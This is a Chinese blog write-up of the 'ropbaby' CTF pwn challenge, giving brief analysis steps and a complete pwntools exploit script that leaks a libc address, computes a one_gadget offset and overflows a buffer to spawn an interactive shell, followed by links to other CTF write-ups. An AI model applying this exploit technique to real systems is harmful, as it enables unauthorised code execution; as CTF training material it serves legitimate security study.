1.实验吧_ropbaby(西普杯CTF)_onegadget
2019-05-26 15:22
543 查看
- 分析
1.先查看文件位数,安全机制
2.查看strings,调用函数(特别注意常见的函数) - 漏洞点
- EXP
from pwn import * context.log_level = "debug" p = process('./ropbaby') p.recvuntil(': ') p.sendline('2') p.recvuntil('Enter symbol: ') p.sendline('system') a=p.recvline() libc = a.split(': ')[-1] lib=int(libc,16) - 0x45390 log.success('libc : %#x',lib) onegadget =0x45216+lib p.recvuntil(': ') p.sendline('3') p.recvuntil('(max 1024): ') p.sendline('17') p.sendline('a'*8 + p64(onegadget)) p.recvuntil(': ') p.sendline('4') #让题目正常退出 p.interactive()
相关文章推荐
- 西普实验吧CTF-二叉树遍历
- 实验吧-CTF-简单的sql注入思路
- CTF 实验吧 头有点大
- CTF 实验吧 Forms
- CTF实验吧-WEB专题-4
- ctf入门——实验吧
- 实验吧之CTF---紧急报文
- 实验吧CTF题目之抓到你了(代号:1813)
- 实验吧 Zcrypt(ASIS CTF 2015) BY Assassin
- 实验吧CTF-web
- CTF-实验吧-雌黄出其唇吻
- CTF实验吧-WEB专题-6
- 实验吧CTF题库之二叉树遍历
- 西普实验吧CTF-杯酒人生
- 实验吧NSCTF crypto200:
- 实验吧-CTF题库-速度爆破
- Tamevic’s Ctf-Web writeup@实验吧‘这个看起来有点简单!’
- [CTF]No.0004 [实验吧]登陆一下好吗??
- CTF 实验吧 what a fuck!这是什么鬼东西
- 0ctf 2017 babyheap writeup